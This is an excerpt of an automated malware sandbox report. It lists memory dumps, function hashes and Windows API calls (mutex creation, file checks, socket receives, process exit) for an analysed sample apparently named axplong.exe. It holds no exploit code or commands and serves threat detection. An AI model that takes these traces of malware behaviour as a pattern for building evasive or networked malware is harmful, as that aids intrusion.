Associated: 00000005.00000002.269495075911.00000000002F9000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495152037.0000000000300000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495224243.000000000030D000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495296054.0000000000311000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495374226.000000000031A000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495471030.000000000031B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495545830.000000000031C000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495613757.000000000031F000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495680316.0000000000327000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495753398.0000000000328000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495832475.0000000000329000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495905769.000000000032B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495977278.000000000032C000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496049614.0000000000330000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496125662.0000000000339000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496192237.000000000033C000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496267370.000000000034A000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496332782.000000000034C000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496403043.0000000000355000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496487974.0000000000359000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496487974.0000000000376000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496678595.00000000003A3000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496755725.00000000003A4000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496825453.00000000003AC000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496897073.00000000003AE000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496976743.00000000003BB000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269497051183.00000000003BC000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b0000_0d47c4c34f.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 1e984e83d7f73d26cf5b9832e99f63f692b83fb78e916fe0afb86e66eb1961fe
Instruction ID: bb1b0bf87c8a403ae4498a12cab7892723d23b9a32ce60f6267e5304550e0920
Opcode Fuzzy Hash: 1e984e83d7f73d26cf5b9832e99f63f692b83fb78e916fe0afb86e66eb1961fe
Instruction Fuzzy Hash: 612176317142009BEB189B6CDD887ECB6A2DF86310F20423DE514ABAD5CBB699C18352

Function 000BA786 Relevance: 3.1, APIs: 2, Instructions: 100sleepsynchronizationCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000064), ref: 000BA893
CreateMutexA.KERNEL32(00000000,00000000,00113224), ref: 000BA8B1

Memory Dump Source

Source File: 00000005.00000002.269493384528.00000000000B1000.00000040.00000001.01000000.00000009.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000005.00000002.269493336767.00000000000B0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269493384528.0000000000112000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269493542699.0000000000119000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269493601454.000000000011B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269493651844.0000000000127000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269493973150.0000000000282000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494030541.0000000000284000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494085729.0000000000293000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494085729.00000000002A0000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494189625.00000000002A5000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494237891.00000000002A7000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494283578.00000000002A8000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494356681.00000000002A9000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494446907.00000000002BB000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494529322.00000000002BD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494614921.00000000002CF000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494677039.00000000002D0000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494751951.00000000002D8000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494828912.00000000002E4000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494916130.00000000002F6000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494992643.00000000002F8000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495075911.00000000002F9000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495152037.0000000000300000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495224243.000000000030D000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495296054.0000000000311000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495374226.000000000031A000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495471030.000000000031B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495545830.000000000031C000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495613757.000000000031F000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495680316.0000000000327000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495753398.0000000000328000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495832475.0000000000329000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495905769.000000000032B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495977278.000000000032C000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496049614.0000000000330000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496125662.0000000000339000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496192237.000000000033C000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496267370.000000000034A000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496332782.000000000034C000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496403043.0000000000355000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496487974.0000000000359000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496487974.0000000000376000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496678595.00000000003A3000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496755725.00000000003A4000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496825453.00000000003AC000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496897073.00000000003AE000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496976743.00000000003BB000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269497051183.00000000003BC000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b0000_0d47c4c34f.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 616aa1241a7aaba41f709abe32dfc0970812dfa7c449305e171bd1ec6a3bb6f8
Instruction ID: 18ac96f1f52c633b8b5d61c966e0d1710bc1614b86e17b497f7d5013193a1207
Opcode Fuzzy Hash: 616aa1241a7aaba41f709abe32dfc0970812dfa7c449305e171bd1ec6a3bb6f8
Instruction Fuzzy Hash: 9321423035C1005AEB286B68995E7FC76A1DFC7700F244939E145A6AD3CFB548824293

Function 000B86E2 Relevance: 1.5, APIs: 1, Instructions: 14COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(?,000BD92D,?,?,?,?), ref: 000B86E9

Memory Dump Source

Source File: 00000005.00000002.269493384528.00000000000B1000.00000040.00000001.01000000.00000009.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000005.00000002.269493336767.00000000000B0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269493384528.0000000000112000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269493542699.0000000000119000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269493601454.000000000011B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269493651844.0000000000127000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269493973150.0000000000282000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494030541.0000000000284000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494085729.0000000000293000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494085729.00000000002A0000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494189625.00000000002A5000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494237891.00000000002A7000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494283578.00000000002A8000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494356681.00000000002A9000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494446907.00000000002BB000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494529322.00000000002BD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494614921.00000000002CF000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494677039.00000000002D0000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494751951.00000000002D8000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494828912.00000000002E4000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494916130.00000000002F6000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494992643.00000000002F8000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495075911.00000000002F9000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495152037.0000000000300000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495224243.000000000030D000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495296054.0000000000311000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495374226.000000000031A000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495471030.000000000031B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495545830.000000000031C000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495613757.000000000031F000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495680316.0000000000327000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495753398.0000000000328000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495832475.0000000000329000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495905769.000000000032B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495977278.000000000032C000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496049614.0000000000330000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496125662.0000000000339000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496192237.000000000033C000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496267370.000000000034A000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496332782.000000000034C000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496403043.0000000000355000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496487974.0000000000359000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496487974.0000000000376000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496678595.00000000003A3000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496755725.00000000003A4000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496825453.00000000003AC000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496897073.00000000003AE000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496976743.00000000003BB000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269497051183.00000000003BC000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b0000_0d47c4c34f.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 20941cacbcfb78cbb35bcaee4f31c8ce1f51a79dbb185057ef541e1e4ff53281
Instruction ID: 5ebab0c29e5a6240a5cb171179761d1e54492919a1571caab53748c3dc105647
Opcode Fuzzy Hash: 20941cacbcfb78cbb35bcaee4f31c8ce1f51a79dbb185057ef541e1e4ff53281
Instruction Fuzzy Hash: 0CC08C280226001AED1C053C528C0E833484B6B3A82E46B84C1B04A0F1C9759807D314

Function 000B86E0 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(?,000BD92D,?,?,?,?), ref: 000B86E9

Memory Dump Source

Source File: 00000005.00000002.269493384528.00000000000B1000.00000040.00000001.01000000.00000009.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000005.00000002.269493336767.00000000000B0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269493384528.0000000000112000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269493542699.0000000000119000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269493601454.000000000011B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269493651844.0000000000127000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269493973150.0000000000282000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494030541.0000000000284000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494085729.0000000000293000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494085729.00000000002A0000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494189625.00000000002A5000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494237891.00000000002A7000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494283578.00000000002A8000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494356681.00000000002A9000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494446907.00000000002BB000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494529322.00000000002BD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494614921.00000000002CF000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494677039.00000000002D0000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494751951.00000000002D8000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494828912.00000000002E4000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494916130.00000000002F6000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494992643.00000000002F8000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495075911.00000000002F9000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495152037.0000000000300000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495224243.000000000030D000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495296054.0000000000311000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495374226.000000000031A000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495471030.000000000031B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495545830.000000000031C000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495613757.000000000031F000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495680316.0000000000327000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495753398.0000000000328000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495832475.0000000000329000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495905769.000000000032B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495977278.000000000032C000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496049614.0000000000330000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496125662.0000000000339000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496192237.000000000033C000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496267370.000000000034A000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496332782.000000000034C000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496403043.0000000000355000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496487974.0000000000359000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496487974.0000000000376000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496678595.00000000003A3000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496755725.00000000003A4000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496825453.00000000003AC000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496897073.00000000003AE000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496976743.00000000003BB000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269497051183.00000000003BC000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b0000_0d47c4c34f.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: b12caa40fa5c156433e213fca50dd0f9fe9b9ae813938bb99a9b5e0788f3b556
Instruction ID: f27d3134aa3beb182b7ef9c6a9e0da284db3154036ecadc604dd9ab753813c7c
Opcode Fuzzy Hash: b12caa40fa5c156433e213fca50dd0f9fe9b9ae813938bb99a9b5e0788f3b556
Instruction Fuzzy Hash: 02C08C380222005AEA1C4A2CA28C0A433089F2B3293F05B98C1B14A0F1CAB2C403C764

Function 052908A4 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.269503040358.0000000005290000.00000040.00001000.00020000.00000000.sdmp, Offset: 05290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5290000_0d47c4c34f.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9f4d2da1e6c568be573f3fc76a157ccd36dab2a16e950d28026ac2a64080ec3
Instruction ID: 641990cb02ac2c0cb8bf1313ff0d66e5b34ee0e37b523a992d01b842d832dbf0
Opcode Fuzzy Hash: f9f4d2da1e6c568be573f3fc76a157ccd36dab2a16e950d28026ac2a64080ec3
Instruction Fuzzy Hash: C5F0C2D32A91297C788790A2274CAF3AE6FFDC3A303318427F443D1A02E6C84A4961B0

Function 0529087B Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.269503040358.0000000005290000.00000040.00001000.00020000.00000000.sdmp, Offset: 05290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5290000_0d47c4c34f.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85b48b57938a013ad4552926f9ca29bf7751529a41276ba76930bbccca017758
Instruction ID: 4dfa92d78053d0fb62ba898e5f0f0ad662b34f7590936b83234ca308fcb4dbe2
Opcode Fuzzy Hash: 85b48b57938a013ad4552926f9ca29bf7751529a41276ba76930bbccca017758
Instruction Fuzzy Hash: A1F05E972B912DBC7486D082279CAF39A2FFDD7A713314423B403D1B02A6D80B5861B1

Non-executed Functions

Function 000BDFD0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 102networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(?,?,00000004,00000000), ref: 000BE01B
recv.WS2_32(?,?,00000008,00000000), ref: 000BE050

Strings

p.gc, xrefs: 000BDFE4

Memory Dump Source

Source File: 00000005.00000002.269493384528.00000000000B1000.00000040.00000001.01000000.00000009.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000005.00000002.269493336767.00000000000B0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269493384528.0000000000112000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269493542699.0000000000119000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269493601454.000000000011B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269493651844.0000000000127000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269493973150.0000000000282000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494030541.0000000000284000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494085729.0000000000293000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494085729.00000000002A0000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494189625.00000000002A5000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494237891.00000000002A7000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494283578.00000000002A8000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494356681.00000000002A9000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494446907.00000000002BB000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494529322.00000000002BD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494614921.00000000002CF000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494677039.00000000002D0000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494751951.00000000002D8000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494828912.00000000002E4000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494916130.00000000002F6000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494992643.00000000002F8000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495075911.00000000002F9000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495152037.0000000000300000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495224243.000000000030D000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495296054.0000000000311000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495374226.000000000031A000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495471030.000000000031B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495545830.000000000031C000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495613757.000000000031F000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495680316.0000000000327000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495753398.0000000000328000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495832475.0000000000329000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495905769.000000000032B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495977278.000000000032C000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496049614.0000000000330000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496125662.0000000000339000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496192237.000000000033C000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496267370.000000000034A000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496332782.000000000034C000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496403043.0000000000355000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496487974.0000000000359000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496487974.0000000000376000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496678595.00000000003A3000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496755725.00000000003A4000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496825453.00000000003AC000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496897073.00000000003AE000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496976743.00000000003BB000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269497051183.00000000003BC000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b0000_0d47c4c34f.jbxd

Yara matches

Similarity

API ID: recv
String ID: p.gc
API String ID: 1507349165-2259671528
Opcode ID: f8ce4f8ff7f1414239eab1daad6734d2c657d26e0e7338eb199e047540ef5e0d
Instruction ID: cc900d0e21ae52584fbf513c4ddf683bf8ad6e13b9e85518716d26137f929b58
Opcode Fuzzy Hash: f8ce4f8ff7f1414239eab1daad6734d2c657d26e0e7338eb199e047540ef5e0d
Instruction Fuzzy Hash: 9231F4719002489FD714DBA8DC81FEEBBE8EB0C724F144225F911E7692CA75A8858BA0

Analysis Process: axplong.exePID: 8880, Parent PID: 8708COMMON

Execution Graph

Execution Coverage:	1.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	1869
Total number of Limit Nodes:	15

Executed Functions

Function 0066645B Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(?,?,0066645A,?,?,?,?,?,006674AE), ref: 00666497

Memory Dump Source

Source File: 00000006.00000002.269506314681.0000000000631000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00630000, based on PE: true

Associated: 00000006.00000002.269506265175.0000000000630000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269506314681.0000000000692000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269506489899.0000000000699000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269506548392.000000000069B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269506595722.00000000006A7000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269506897719.0000000000802000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269506931878.0000000000804000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269506972578.0000000000813000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269506972578.0000000000820000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507055442.0000000000825000.00000080.00000001.01000000.0000000A.sdmpDownload File
